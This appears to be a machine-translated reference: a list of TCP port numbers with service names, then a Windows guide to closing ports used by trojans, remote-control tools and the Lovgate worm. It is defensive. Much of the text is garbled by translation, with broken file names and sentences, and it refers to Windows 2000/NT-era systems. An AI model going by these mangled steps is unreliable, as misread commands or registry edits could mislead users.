1657/tcp fujitsu-mmpdc fujitsu-mmpdc. .


1658/tcp sixnetudr sixnetudr 。.


1659/tcp sg-lm Silicon Grail License Manager. .


1660/tcp skip-mc-gikreq skip-mc-gikreq 。.


1661/tcp netview-aix-1 netview-aix-1. .


1662/tcp netview-aix-2 netview-aix-2 。.


1663/tcp netview-aix-3 netview-aix-3. .


1664/tcp netview-aix-4 netview-aix-4 。.


1665/tcp netview-aix-5 netview-aix-5. .


1666/tcp netview-aix-6 netview-aix-6 。.


1667/tcp netview-aix-7 netview-aix-7. .


1668/tcp netview-aix-8 netview-aix-8 。.


1669/tcp netview-aix-9 netview-aix-9. .


1670/tcp netview-aix-10 netview-aix-10 。.


1671/tcp netview-aix-11 netview-aix-11. .


1672/tcp netview-aix-12 netview-aix-12 。.


1673/tcp proshare-mc-1 Intel Proshare Multicast. .


1674/tcp proshare-mc-2 Intel Proshare Multicast 。.


1675/tcp pdp Pacific Data Products. .


1676/tcp netcomm1 netcomm1 。.


1677/tcp groupwise groupwise. .


1678/tcp prolink prolink 。.


1679/tcp darcorp-lm darcorp-lm. .


1681/tcp sd-elmd sd-elmd 。.


1682/tcp lanyon-lantern lanyon-lantern. .


1683/tcp ncpm-hip ncpm-hip 。.


1684/tcp snaresecure SnareSecure. .


1685/tcp n2nremote n2nremote 。.


1686/tcp cvmon cvmon. .


1687/tcp nsjtp-ctrl nsjtp-ctrl 。.


1688/tcp nsjtp-data nsjtp-data. .


1689/tcp firefox firefox 。.


1690/tcp ng-umds ng-umds. .


1691/tcp empire-empuma empire-empuma 。.


1692/tcp sstsys-lm sstsys-lm. .


1693/tcp rrirtr rrirtr 。.


1694/tcp rrimwm rrimwm. .


1695/tcp rrilwm rrilwm 。.


1696/tcp rrifmm rrifmm. .


1697/tcp rrisat rrisat 。.


1698/tcp rsvp-encap-1 RSVP-ENCAPSULATION-1. .


1699/tcp rsvp-encap-2 RSVP-ENCAPSULATION-2 。.


1700/tcp mps-raft mps-raft. .


1701/tcp l2f,l2tp l2f,l2tp 。.


1702/tcp deskshare deskshare. .


1703/tcp hb-engine hb-engine 。.


1704/tcp bcs-broker bcs-broker. .


1705/tcp slingshot slingshot 。.


1706/tcp jetform jetform. .


1707/tcp vdmplay vdmplay 。.


1708/tcp gat-lmd gat-lmd. .


1709/tcp centra centra 。.


1710/tcp impera impera. .


1711/tcp pptconference pptconference 。.


1712/tcp registrar resource monitoring service. .


1713/tcp conferencetalk ConferenceTalk 。.


1714/tcp sesi-lm sesi-lm. .


1715/tcp houdini-lm houdini-lm 。.


1716/tcp xmsg xmsg. .


1717/tcp fj-hdnet fj-hdnet 。.


1718/tcp h323gatedisc h323gatedisc. .


1719/tcp h323gatestat h323gatestat 。.


1720/tcp h323hostcall h323hostcall. .


1721/tcp caicci caicci 。.


1722/tcp hks-lm HKS License Manager. .


1723/tcp pptp pptp 。.


1724/tcp csbphonemaster csbphonemaster. .


1725/tcp iden-ralp iden-ralp 。.


1726/tcp iberiagames IBERIAGAMES. .


1727/tcp winddx winddx 。.


1728/tcp telindus TELINDUS. .


1729/tcp citynl CityNL License Management 。.


1730/tcp roketz roketz. .


1731/tcp msiccp MSICCP 。.


1732/tcp proxim proxim. .


1733/tcp siipat SIMS – SIIPAT Protocol for Alarm Transmission 。.


1734/tcp cambertx-lm Camber Corporation License Management. .


1735/tcp privatechat PrivateChat 。.


1736/tcp street-stream street-stream. .


1737/tcp ultimad ultimad 。.


1738/tcp gamegen1 GameGen1. .


1739/tcp webaccess webaccess 。.


1740/tcp encore encore. .


1741/tcp cisco-net-mgmt cisco-net-mgmt 。.


1742/tcp 3Com-nsd 3Com-nsd. .


1743/tcp cinegrfx-lm Cinema Graphics License Manager 。.


1744/tcp ncpm-ft ncpm-ft. .


1745/tcp remote-winsock remote-winsock 。.


1746/tcp ftrapid-1 ftrapid-1. .


1747/tcp ftrapid-2 ftrapid-2 。.


1748/tcp oracle-em1 oracle-em1. .


1749/tcp aspen-services aspen-services 。.


1750/tcp sslp Simple Socket Library's PortMaster. .


1751/tcp swiftnet SwiftNet 。.


1752/tcp lofr-lm Leap of Faith Research License Manager. .


1753/tcp translogic-lm Translogic License Manager 。.


1754/tcp oracle-em2 oracle-em2. .


1755/tcp ms-streaming ms-streaming 。.


1756/tcp capfast-lmd capfast-lmd. .


1757/tcp cnhrp cnhrp 。.


1758/tcp tftp-mcast tftp-mcast. .


1759/tcp spss-lm SPSS License Manager 。.


1760/tcp www-ldap-gw www-ldap-gw. .


1761/tcp cft-0 cft-0 。.


1762/tcp cft-1 cft-1. .


1763/tcp cft-2 cft-2 。.


1764/tcp cft-3 cft-3. .


1765/tcp cft-4 cft-4 。.


1766/tcp cft-5 cft-5. .


1767/tcp cft-6 cft-6 。.


1768/tcp cft-7 cft-7. .


1769/tcp bmc-net-adm bmc-net-adm 。.


1770/tcp bmc-net-svc bmc-net-svc. .


1771/tcp vaultbase vaultbase 。.


1772/tcp essweb-gw EssWeb Gateway. .


1773/tcp kmscontrol KMSControl 。.


1774/tcp global-dtserv global-dtserv. .


1776/tcp femis Federal Emergency Management Information System 。.


1777/tcp powerguardian powerguardian. .


1779/tcp pharmasoft pharmasoft 。.


1780/tcp dpkeyserv dpkeyserv. .


1781/tcp answersoft-lm answersoft-lm 。.


1782/tcp hp-hcip hp-hcip. .


1783/tcp fjris Fujitsu Remote Install Service 。.


1784/tcp finle-lm Finle License Manager. .


1785/tcp windlm Wind River Systems License Manager 。.


1786/tcp funk-logger funk-logger. .


1787/tcp funk-license funk-license 。.


1788/tcp psmond psmond. .


1789/tcp hello hello 。.


1790/tcp nmsp Narrative Media Streaming Protocol. .


1791/tcp ea1 EA1 。.


1792/tcp ibm-dt-2 ibm-dt-2. .


1793/tcp rsc-robot rsc-robot 。.


1794/tcp cera-bcm cera-bcm. .


1795/tcp dpi-proxy dpi-proxy 。.


1796/tcp vocaltec-admin Vocaltec Server Administration. .


1797/tcp uma UMA 。.


1798/tcp etp Event Transfer Protocol. .


1799/tcp netrisk NETRISK 。.


1801/tcp msmq Microsoft Message Que. .


1804/tcp enl ENL 。.


1807/tcp fhsp Fujitsu Hot Standby Protocol. .


1812/tcp radius RADIUS 。.


1813/tcp radius-acct RADIUS Accounting. .


1814/tcp tdp-suite TDP Suite 。.


1815/tcp mmpft MMPFT. .


1816/tcp harp HARP 。.


1818/tcp etftp Enhanced Trivial File Transfer Protocol. .


1819/tcp plato-lm Plato License Manager 。.


1820/tcp mcagent mcagent. .


1821/tcp donnyworld donnyworld 。.


1822/tcp es-elmd es-elmd. .


1823/tcp unisys-lm Unisys Natural Language License Manager 。.


1824/tcp metrics-pas metrics-pas. .


1850/tcp gsi GSI 。.


1863/tcp msnp MSNP. .


1865/tcp entp ENTP 。.


1901/tcp fjicl-tep-a Fujitsu ICL Terminal Emulator Program A. .


1902/tcp fjicl-tep-b Fujitsu ICL Terminal Emulator Program B 。.


1903/tcp linkname Local Link Name Resolution. .


1904/tcp fjicl-tep-c Fujitsu ICL Terminal Emulator Program C 。.


1905/tcp sugp Secure UP. . Link Gateway Protocol. .


1906/tcp tpmd TPortMapperReq 。.


1908/tcp dawn Dawn. .


1911/tcp mtp Starlight Networks Multimedia Transport Protocol 。.


1913/tcp armadp armadp. .


1914/tcp elm-momentum Elm-Momentum 。.


1915/tcp facelink FACELINK. .


1916/tcp persona Persoft Persona 。.


1917/tcp noagent nOAgent. .


1921/tcp noadmin NoAdmin 。.


1944/tcp close-combat close-combat. .


1945/tcp dialogic-elmd dialogic-elmd 。.


1946/tcp tekpls tekpls. .


1947/tcp hlserver hlserver 。.


1948/tcp eye2eye eye2eye. .


1949/tcp ismaeasdaqlive ISMA Easdaq Live 。.


1950/tcp ismaeasdaqtest ISMA Easdaq Test. .


1951/tcp bcs-lmserver bcs-lmserver 。.


1973/tcp dlsrap Data Link Switching Remote Access Protocol. .


1985/tcp hsrp Hot Standby Router Protocol 。.


1986/tcp licensedaemon cisco license management. .


1987/tcp tr-rsrb-p1 cisco RSRB Priority 1 port 。.


1988/tcp tr-rsrb-p2 cisco RSRB Priority 2 port. .


1989/tcp tr-rsrb-p3 cisco RSRB Priority 3 port 。.


1989/tcp mshnet MHSnet system. .


1990/tcp stun-p1 cisco STUN Priority 1 port 。.


1991/tcp stun-p2 cisco STUN Priority 2 port. .


1992/tcp stun-p3 cisco STUN Priority 3 port 。.


1992/tcp ipsendmsg IPsendmsg. .


1993/tcp snmp-tcp-port cisco SNMP TCP port 。.


1994/tcp stun-port cisco serial tunnel port. .


1995/tcp perf-port cisco perf port 。.


1996/tcp tr-rsrb-port cisco Remote SRB port. .


1997/tcp gdp-port cisco Gateway Discovery Protocol 。.


1998/tcp x25-svc-port cisco X. .25 Service (XOT). .


1999/tcp tcp-id-port cisco identification port 。.


2000/tcp callbook. .


2001/tcp dc 。.


2002/tcp globe. .


2004/tcp mailbox 。.


2005/tcp berknet. .


2007/tcp dectalk 。.


2012/tcp ttyinfo. .


2013/tcp raid-am 。.


2014/tcp troff. .


2015/tcp cypress 。.


2025/tcp ellpack. .


2030/tcp device2 。.


2032/tcp blackboard. .


2033/tcp glogger 。.


2035/tcp imsldoc. .


2040/tcp lam 。.


2042/tcp isis isis. .


2044/tcp rimsl 。.


2045/tcp cdfunc. .


2046/tcp sdfunc 。.


2047/tcp dls. .


2049/tcp shilp 。.


2049/tcp nfs Network File System - Sun Microsystems. .


2065/tcp dlsrpn Data Link Switch Read Port Number 。.


2067/tcp dlswpn Data Link Switch Write Port Number. .


2090/tcp lrp Load Report Protocol 。.


2091/tcp prp PRP. .


2102/tcp zephyr-srv Zephyr server 。.


2103/tcp zephyr-clt Zephyr serv-hm connection. .


2104/tcp zephyr-hm Zephyr hostmanager 。.


2105/tcp minipay MiniPay. .


2200/tcp ici ICI 。.


2201/tcp ats Advanced Training System Program. .


2213/tcp kali Kali 。.


2222/tcp unreg-ab2 Allen-Bradley unregistered port. .


2232/tcp ivs-video IVS Video default 。.


2234/tcp directplay DirectPlay. .


2236/tcp nani Nani 。.


2240/tcp recipe RECIPe. .


2241/tcp ivsd IVS Daemon 。.


2242/tcp foliocorp Folio Remote Server. .


2279/tcp xmquery xmquery 。.


2280/tcp lnvpoller LNVPOLLER. .


2281/tcp lnvconsole LNVCONSOLE 。.


2282/tcp lnvalarm LNVALARM. .


2283/tcp lnvstatus LNVSTATUS 。.


2284/tcp lnvmaps LNVMAPS. .


2285/tcp lnvmailmon LNVMAILMON 。.


2286/tcp nas-metering NAS-Metering. .


2287/tcp dna DNA 。.


2288/tcp netml NETML. .


2300/tcp cvmmon CVMMON 。.


2307/tcp pehelp pehelp. .


2308/tcp sdhelp sdhelp 。.


2313/tcp iapp IAPP (Inter Access Point Protocol). .


2316/tcp sent-lm SENT License Manager 。.


2321/tcp rdlap RDLAP over UDP. .


2322/tcp ofsd ofsd 。.


2323/tcp 3d-nfsd 3d-nfsd. .


2326/tcp idcp IDCP 。.


2327/tcp xingcsm xingcsm. .


2329/tcp nvd NVD 。.


2330/tcp tscchat TSCCHAT. .


2333/tcp snapp SNAPP 。.


2337/tcp ideesrv ideesrv. .


2344/tcp fcmsys fcmsys 。.


2345/tcp dbm dbm. .


2356/tcp gxtelmd GXT License Managemant 。.


2358/tcp futrix Futrix. .


2390/tcp rsmtp RSMTP 。.


2396/tcp wusage Wusage. .


2397/tcp ncl NCL 。.


2398/tcp orbiter Orbiter. .


2401/tcp cvspserver cvspserver 。.


2407/tcp orion Orion. .


2412/tcp cdn CDN 。.


2415/tcp comtest COMTEST. .


2418/tcp cas cas 。.


2421/tcp g-talk G-Talk. .


2423/tcp rnrp RNRP 。.


2427/tcp stgcp Simple telephony Gateway Control Protocol. .


2428/tcp ott One Way Trip Time 。.


2429/tcp ft-role FT-ROLE. .


2430/tcp venus venus 。.


2432/tcp codasrv codasrv. .


2436/tcp topx TOP/X 。.


2438/tcp msp MSP. .


2443/tcp powerclientcsf PowerClient Central Storage Facility 。.


2445/tcp dtn1 DTN1. .


2447/tcp ovwdb OpenView NNM daemon 。.


2449/tcp ratl RATL. .


2451/tcp netchat netchat 。.


2458/tcp griffin griffin. .


2500/tcp rtsserv Resource Tracking system server 。.


2501/tcp rtsclient Resource Tracking system client. .


2528/tcp ncr_ccl NCR CCL 。.


2529/tcp utsftp UTS FTP. .


2532/tcp ovtopmd OVTOPMD 。.


2592/tcp netrek netrek. .


2628/tcp dict DICT 。.


2634/tcp pk-electronics PK Electronics. .


2636/tcp solve Solve 。.


2639/tcp aminet AMInet. .


2641/tcp hdl-srv HDL Server 。.


2642/tcp tragic Tragic. .


2646/tcp and-lm AND Licence Manager 。.


2653/tcp sonus Sonus. .


2655/tcp unglue UNIX Nt Glue 。.


2656/tcp kana Kana. .


2700/tcp tqdata tqdata 。.


2784/tcp www-dev world wide web - development. .


2785/tcp aic-np aic-np 。.


2786/tcp aic-oncrpc aic-oncrpc - Destiny MCD database. .


2787/tcp piccolo piccolo – Cornerstone Software 。.


2788/tcp fryeserv NetWare Loadable Module - Seagate Software. .


2789/tcp media-agent Media Agent 。.


2908/tcp mao mao. .


2912/tcp epicon Epicon 。.


2971/tcp netclip Net Clip. .


2974/tcp signal Signal 。.


2975/tcp fjmpcm Fujitsu Configuration Management Service. .


3000/tcp hbci HBCI 。.


3001/tcp redwood-broker Redwood Broker. .


3003/tcp cgms CGMS 。.


3010/tcp gw Telerate Workstation. .


3012/tcp twsdss Trusted Web Client 。.


3020/tcp cifs CIFS. .


3047/tcp hlserver Fast Security HL Server 。.


3048/tcp pctrader Sierra Net PC Trader. .


3049/tcp nsws NSWS 。.


3105/tcp cardbox Cardbox. .


3130/tcp icpv2 ICPv2 。.


3141/tcp vmodem VMODEM. .


3143/tcp seaview Sea View 。.


3147/tcp rfio RFIO. .


3264/tcp ccmail cc:mail/lotus 。.


3266/tcp ns-cfg-server NS CFG Server. .


3267/tcp ibm-dial-out IBM Dial Out 。.


3268/tcp msft-gc Microsoft Global Catalog. .


3273/tcp sxmp Simple Extensible Multiplexed Protocol 。.


3275/tcp samd SAMD. .


3279/tcp admind admind 。.


3281/tcp sysopt SYSOPT. .


3284/tcp 4talk 4Talk 。.


3285/tcp plato Plato. .


3286/tcp e-net E-Net 。.


3288/tcp cops COPS. .


3289/tcp enpc ENPC 。.


3290/tcp caps-lm CAPS LOGISTICS TOOLKIT - LM. .


3291/tcp sah-lm S A Holditch & Associates – LM 。.


3293/tcp fg-fps fg-fps. .


3294/tcp fg-gip fg-gip 。.


3296/tcp rib-slm Rib License Manager. .


3299/tcp pdrncs pdrncs 。.


3304/tcp opsession-srvr OP Session Server. .


3306/tcp mysql MySQL 。.


3309/tcp tns-adv TNS ADV. .


3313/tcp uorb Unify Object Broker 。.


3314/tcp uohost Unify Object Host. .


3315/tcp cdid CDID 。.


3318/tcp ssrip Swith to Swith Routing Information Protocol. .


3319/tcp sdt-lmd SDT License Manager 。.


3321/tcp vnsstr VNSSTR. .


3326/tcp sftu SFTU 。.


3327/tcp bbars BBARS. .


3328/tcp egptlm Eaglepoint License Manager 。.


3329/tcp hp-device-disc HP Device Disc. .


3330/tcp mcs-calypsoicf MCS Calypso ICF 。.


3333/tcp dec-notes DEC Notes. .


3338/tcp anet-b OMF data b 。.


3339/tcp anet-l OMF data l. .


3340/tcp anet-m OMF data m 。.


3341/tcp anet-h OMF data h. .


3342/tcp webtie WebTIE 。.


3351/tcp btrieve BTRIEVE. .


3352/tcp ssql SSQL 。.


3353/tcp fatpipe FATPIPE. .


3354/tcp suitjd SUITJD 。.


3362/tcp dj-ilm DJ ILM. .


3372/tcp tip2 TIP 2 。.


3378/tcp wsicopy WSICOPY. .


3379/tcp socorfs SOCORFS 。.


3381/tcp geneous Geneous. .


3383/tcp esp-lm Enterprise Software Products License Manager 。.


3390/tcp dsc Distributed Service Coordinator. .


3391/tcp savant SAVANT 。.


3392/tcp efi-lm EFI License Management. .


3395/tcp dyna-lm Dyna License Manager (Elam) 。.


3421/tcp bmap Bull Apprise portmapper. .


3455/tcp prsvp RSVP Port 。.


3456/tcp vat VAT default data. .


3457/tcp vat-control VAT default control 。.


3900/tcp udt_os Unidata UDT OS. .


3984/tcp mapper-nodemgr MAPPER network node manager 。.


3985/tcp mapper-mapethd MAPPER TCP / IP server. .


3986/tcp mapper-ws_ethd MAPPER workstation server 。.


4001/tcp newoak NewOak. .


4008/tcp netcheque NetCheque accounting 。.


4096/tcp bre BRE (Bridge Relay Element). .


4132/tcp nuts_dem NUTS Daemon 。.


4133/tcp nuts_bootp NUTS Bootp Server. .


4143/tcp oidsr document。.nbspReplication 。.


4321/tcp rwhois Remote Who Is. .


4343/tcp unicall UNICALL 。.


4346/tcp elanlm ELAN LM. .


4348/tcp itose ITOSE 。.


4444/tcp krb524 KRB524. .


4444/tcp nv-video NV Video default 。.


4446/tcp n1-fwp N1-FWP. .


4449/tcp privatewire PrivateWire 。.


4450/tcp camp Camp. .


4451/tcp ctisystemmsg CTI System Msg 。.


4452/tcp ctiprogramload CTI Program Load. .


4500/tcp sae-urn sae-urn 。.


4501/tcp urn-x-cdchoice urn-x-cdchoice. .


4546/tcp sf-lm SF License Manager (Sentinel) 。.


4672/tcp rfa remote file access server. .


4800/tcp iims Icona Instant Messenging System 。.


4801/tcp iwec Icona Web Embedded Chat. .


4802/tcp ilss Icona License System Server 。.


4827/tcp htcp HTCP. .


4868/tcp phrelay Photon Relay 。.


4885/tcp abbs ABBS. .


5002/tcp rfe radio free ethernet 。.


5003/tcp fmpro-internal FileMaker, Inc. . - Proprietary transport. .


5004/tcp avt-profile-1 avt-profile-1 。.


5005/tcp avt-profile-2 avt-profile-2. .


5010/tcp telelpathstart TelepathStart 。.


5020/tcp zenginkyo-1 zenginkyo-1. .


5021/tcp zenginkyo-2 zenginkyo-2 。.


5050/tcp mmcc multimedia conference control tool. .


5060/tcp sip SIP 。.


5150/tcp atmp Ascend Tunnel Management Protocol. .


5190/tcp aol America-Online 。.


5191/tcp aol-1 AmericaOnline1. .


5192/tcp aol-2 AmericaOnline2 。.


5193/tcp aol-3 AmericaOnline3. .


5272/tcp pk PK 。.


5300/tcp hacl-hb # HA cluster heartbeat. .


5301/tcp hacl-gs # HA cluster general services 。.


5304/tcp hacl-local # HA Cluster Commands. .


5305/tcp hacl-test # HA Cluster Test 。.


5307/tcp sco-aip SCO AIP. .


5310/tcp outlaws Outlaws 。.


5311/tcp tmlogin TM Login. .


5400/tcp excerpt Excerpt Search 。.


5402/tcp mftp MFTP. .


5404/tcp hpoms-dps-lstn HPOMS-DPS-LSTN 。.


5407/tcp foresyte-clear Foresyte-Clear. .


5409/tcp salient-dtasrv Salient Data Server 。.


5410/tcp salient-usrmgr Salient User Manager. .


5411/tcp actnet ActNet 。.


5414/tcp statusd StatusD. .


5418/tcp mcntp MCNTP 。.


5419/tcp dj-ice DJ-ICE. .


5500/tcp fcp-addr-srvr1 fcp-addr-srvr1 。.


5501/tcp fcp-addr-srvr2 fcp-addr-srvr2. .


5502/tcp fcp-srvr-inst1 fcp-srvr-inst1 。.


5503/tcp fcp-srvr-inst2 fcp-srvr-inst2. .


5504/tcp fcp-cics-gw1 fcp-cics-gw1 。.


5555/tcp personal-agent Personal Agent. .


5602/tcp a1-msc A1-MSC 。.


5603/tcp a1-bs A1-BS. .


5631/tcp pcanywheredata pcANYWHEREdata 。.


5632/tcp pcanywherestat pcANYWHEREstat. .


5678/tcp rrac Remote Replication Agent Connection 。.


5679/tcp dccm Direct Cable Connect Manager. .


5713/tcp proshareaudio proshare conf audio 。.


5714/tcp prosharevideo proshare conf video. .


5715/tcp prosharedata proshare conf data 。.


5717/tcp prosharenotify proshare conf notify. .


5729/tcp openmail Openmail User Agent Layer 。.


5741/tcp ida-discover1 IDA Discover Port 1. .


5742/tcp ida-discover2 IDA Discover Port 2 。.


5745/tcp fcopy-server fcopy-server. .


5746/tcp fcopys-server fcopys-server 。.


5755/tcp openmailg OpenMail Desk Gateway server. .


5757/tcp x500ms OpenMail X。.500 Directory Server 。.


5766/tcp openmailns OpenMail NewMail Server. .


5767/tcp s-openmail OpenMail Suer Agent Layer (Secure) 。.


6000/tcp x11 X Window System. .


6110/tcp softcm HP SoftBench CM 。.


6111/tcp spc HP SoftBench Sub-Process Control. .


6112/tcp dtspcd dtspcd 。.


6123/tcp backup-express Backup Express. .


6141/tcp meta-corp Meta Corporation License Manager 。.


6142/tcp aspentec-lm Aspen Technology License Manager. .


6143/tcp watershed-lm Watershed License Manager 。.


6144/tcp statsci1-lm StatSci License Manager - 1. .


6145/tcp statsci2-lm StatSci License Manager – 2 。.


6146/tcp lonewolf-lm Lone Wolf Systems License Manager. .


6147/tcp montage-lm Montage License Manager 。.


6148/tcp ricardo-lm Ricardo North America License Manager. .


6149/tcp tal-pod tal-pod 。.


6253/tcp crip CRIP. .


6389/tcp clariion-evr01 clariion-evr01 。.


6500/tcp boks BoKS Master. .


6558/tcp xdsxdm 。.


6665/tcp ircu IRCU. .


6670/tcp vocaltec-gold Vocaltec Global Online Directory 。.


6672/tcp vision_server vision_server. .


6673/tcp vision_elmd vision_elmd 。.


6790/tcp hnmp HNMP. .


6831/tcp ambit-lm ambit-lm 。.


6969/tcp acmsoda acmsoda. .


7010/tcp ups-onlinet onlinet uninterruptable power supplies 。.


7020/tcp dpserve DP Serve. .


7070/tcp arcp ARCP 。.


7099/tcp lazy-ptop lazy-ptop. .


7100/tcp font-service X Font Service 。.


7121/tcp virprot-lm Virtual Prototypes License Manager. .


7174/tcp clutild Clutild 。.


7200/tcp fodms FODMS FLIP. .


7201/tcp dlip DLIP 。.


7395/tcp winqedit winqedit. .


7426/tcp pmdmgr OpenView DM Postmaster Manager 。.


7430/tcp xmpv7 OpenView DM xmpv7 api pipe. .


7431/tcp pmd OpenView DM ovc/xmpv3 api pipe 。.


7491/tcp telops-lmd telops-lmd. .


7511/tcp pafec-lm pafec-lm 。.


7544/tcp nta-ds FlowAnalyzer DisplayServer. .


7545/tcp nta-us FlowAnalyzer UtilityServer 。.


7588/tcp sun-lm Sun License Manager. .


7777/tcp cbt cbt 。.


7781/tcp accu-lmgr accu-lmgr. .


7932/tcp t2-drm Tier 2 Data Resource Manager 。.


7933/tcp t2-brm Tier 2 Business Rules Manager. .


7999/tcp irdmi2 iRDMI2 。.


8000/tcp irdmi iRDMI. .


8032/tcp pro-ed ProEd 。.


8400/tcp cvd cvd. .


8401/tcp sabarsd sabarsd 。.


8402/tcp abarsd abarsd. .


8403/tcp admind admind 。.


8450/tcp npmp npmp. .


8473/tcp vp2p Vitual Point to Point 。.


8888/tcp ddi-tcp-1 NewsEDGE server TCP (TCP 1). .


8889/tcp ddi-tcp-2 Desktop Data TCP 1 。.


8890/tcp ddi-tcp-3 Desktop Data TCP 2. .


8891/tcp ddi-tcp-4 Desktop Data TCP 3: NESS application 。.


8892/tcp ddi-tcp-5 Desktop Data TCP 4: FARM product. .


8893/tcp ddi-tcp-6 Desktop Data TCP 5: NewsEDGE/Web application 。.


8894/tcp ddi-tcp-7 Desktop Data TCP 6: COAL application. .


9000/tcp cslistener CSlistener 。.


9006/tcp sctp SCTP. .


9090/tcp websm WebSM 。.


9535/tcp man. .


9594/tcp msgsys Message System 。.


9595/tcp pds Ping Discovery Service. .


9876/tcp sd Session Director 。.


9992/tcp palace Palace. .


9993/tcp palace Palace 。.


9994/tcp palace Palace. .


9995/tcp palace Palace 。.


9996/tcp palace Palace. .


9997/tcp palace Palace 。.


9998/tcp distinct32 Distinct32. .


9999/tcp distinct distinct 。.


10000/tcp ndmp Network Data Management Protocol. .


11000/tcp irisa IRISA 。.


11001/tcp metasys Metasys. .


12753/tcp tsaf tsaf port 。.


13160/tcp i-zipqd I-ZIPQD. .


13720/tcp bprd BPRD Protocol (VERITAS NetBackup) 。.


13721/tcp bpbrm BPBRM Protocol (VERITAS NetBackup). .


13782/tcp bpcd VERITAS NetBackup 。.


17219/tcp chipper Chipper. .


18000/tcp biimenu Beckman Instruments, Inc。.


19410/tcp hp-sco hp-sco. .


19411/tcp hp-sca hp-sca 。.


19541/tcp jcp JCP Client. .


21845/tcp webphone webphone 。.


21846/tcp netspeak-is NetSpeak Corp. . Directory Services. .


21847/tcp netspeak-cs NetSpeak Corp。. Connection Services 。.


21848/tcp netspeak-acd NetSpeak Corp. . Automatic Call Distribution. .


21849/tcp netspeak-cps NetSpeak Corp。. Credit Processing System 。.


22273/tcp wnn6 wnn6. .


22555/tcp vocaltec-wconf Vocaltec Web Conference 。.


22800/tcp aws-brf Telerate Information Platform LAN. .


22951/tcp brf-gw Telerate Information Platform WAN 。.


24000/tcp med-ltp med-ltp. .


24004/tcp med-ovw med-ovw 。.


24005/tcp med-ci med-ci. .


25000/tcp icl-twobase1 icl-twobase1 。.


25001/tcp icl-twobase2 icl-twobase2. .


25002/tcp icl-twobase3 icl-twobase3 。.


25003/tcp icl-twobase4 icl-twobase4. .


25004/tcp icl-twobase5 icl-twobase5 。.


25005/tcp icl-twobase6 icl-twobase6. .


25006/tcp icl-twobase7 icl-twobase7 。.


25007/tcp icl-twobase8 icl-twobase8. .


25008/tcp icl-twobase9 icl-twobase9 。.


25009/tcp icl-twobase10 icl-twobase10. .


25793/tcp vocaltec-hos Vocaltec Address Server 。.


26000/tcp quake quake. .


26208/tcp wnn6-ds wnn6-ds 。.


45678/tcp eba EBA PRISE. .


47557/tcp dbbrowse Databeam Corporation 。.


47806/tcp ap ALC Protocol. .


47808/tcp bacnet Building Automation and Control Networks。.


Close method commonly used ports:. .


The clear port 113 Trojans (valid only for windows systems):.


This is an irc chat room based on the control of Trojans. .


1. first use netstat-an command to determine whether your systems open up port 113.


2. . Use the command View fport which program is listening out of 113 ports. .


Download fport utility.


For example, we use fport see the following results:. .


Pid Process Port Proto Path 。.


392 svchost -> 113 TCP C: \ WINNT \ system32 \ vhos. . Exe. .


We can determine the listening on port 113 is vhos Trojan horse. procedure where the .exe path is.


c: \ winnt \ system32 under. .


3. determine the program name (that is listening on port 113), in Task Manager, look to the process.


And use the manager end the process. .


4. in the start-to-run type regedit in the run Registry management program, in the registry, find the other program, you just found.


And delete all related keys. .


5. the Trojan horse in the same directory to delete the program. (Usually the Trojan will also include other programs, such as. ..


rscan. . Exe, psexec. . Exe, ipcpass. . Dic, ipcscan. . Txt and so on, according to. .


Trojan horse programs, files, you can view and modify programs to determine the amount of time.


Monitoring 113 port of Trojan programs and other programs). .


6. reboot the machine.


3389 port closed:. .


3389 port first notes is a windows remote management Terminal open ports, it is not a Trojan horse program, please.


Determine whether the service is open to you. If it is not necessary, turn off the service. .


Close method: win2000.


win2000server Start -> Programs -> Administrative Tools -> Services Terminal Services service find items. .


Select the properties option in the startup type to manual, and the service is stopped.


win2000pro Start -> Settings -> Control Panel -> Administrative Tools -> Services find Terminal Services. .


Services, select the properties option in the startup type to manual, and the service is stopped.


winxp shut down way:. .


On my computer right selected properties – > remote and remote assistance and Remote Desktop two options to get rid of the check box.


4899 port closed:. .


First of all explains 4899 port is a remote control software (remote administrator) on the service side listening port, he could not.


Be a Trojan Horse program, but with remote control, anti-virus software usually can not detect it to, and make sure the service. .


Services, whether it is your own open and is required. If not, please turn it off.


Closed 4899 port:. .


Start-run-cmd > enter (98 following is the command), then cd C:\winnt\system32 (your system.


Installation directory), enter r_server. . Exe / stop and press Enter. .


Then enter r_server/uninstall/silence.


To the C: \ winnt \ system32 (system directory) Delete the r_server. . Exe admdll. . Dll radbrv. . Dll three documents. .


5800, 5900 port:.


1. . Fport order to determine the first use in 5800 and 5900 the port monitor program location (usually is c: \ winnt \ fonts \..


explorer。.exe) 。.


2. . In the Task Manager and kill the relevant process (note that the system itself is a normal, please note! If this penalty can be re-..


Running .exe c:\winnt\explorer.).


3. . Deleted C: \ winnt \ fonts \ in the explorer. . Exe program. .


4. to delete a registry in HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run.


Explorer items. .


5. reboot the machine.


6129 port closed:. .


First of all explains 6129 port is a remote control software (dameware nt utilities) service-side listening to port, he is not.


A Trojan horse program, but with remote control function, the usual anti-virus software can not identify it to the. Make sure the service. .


Whether it is your own installation and is a necessary, if not close.


Closed 6129 port:. .


Select the start – > setting – > Control Panel – > tools – > service management.


DameWare Mini Remote Control items found right click select Properties option, change the startup type to disabled after. .


Stop the service.


To the c: \ winnt \ system32 (system directory) under the DWRCS. . EXE program to delete. .


To the registry table entries within HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\DWMRCS..


1029 port and 20168 port:. .


These two ports are open by lovgate worm, backdoor port.


Worm-related information, see: Lovgate worm: http://it. . Rising. . Com. .cn / newSite / ... rus / Antivirus_Base /. .


TopicExplorerPagePackage/lovgate。.htm 。.


You can download Zhuanshagongju: http://it. . Rising. . Com. .cn / service / ... ovGate_download. . Htm. .


Usage: download directly the program runs after the restart the machine and then run the program again.


45576 port:. .


This is a proxy software control port, make sure the agent software is not your own installation (agent software will give you the machine zone.


To the extra traffic). .


Close agent software:.


1. . Please use fport View the location of the agent software. .


2. in the service of the service to shut down (usually SkSocks), turn off the service.


3. . To the directory where the program is to delete the program. .


For the prevention of 139 port attacks against various system settings vary, here's to describe.


Windows 9x system for use dial-up users do not have to log on to the NT local area network environment, open the Control Panel, then double-click "Network" icon in the "Primary Network Logon" select "Microsoft friendly logon", do not select the "Windows network users" way. In addition, do not set the "File Print Sharing." .


For Windows NT users, you can cancel the NetBIOS and TCP/IP protocol bindings, open "Control Panel", and then double-click the "network" icon in the "NetBIOS interface", select "WINS client (TCP/IP)" to "disable", and restart the computer.


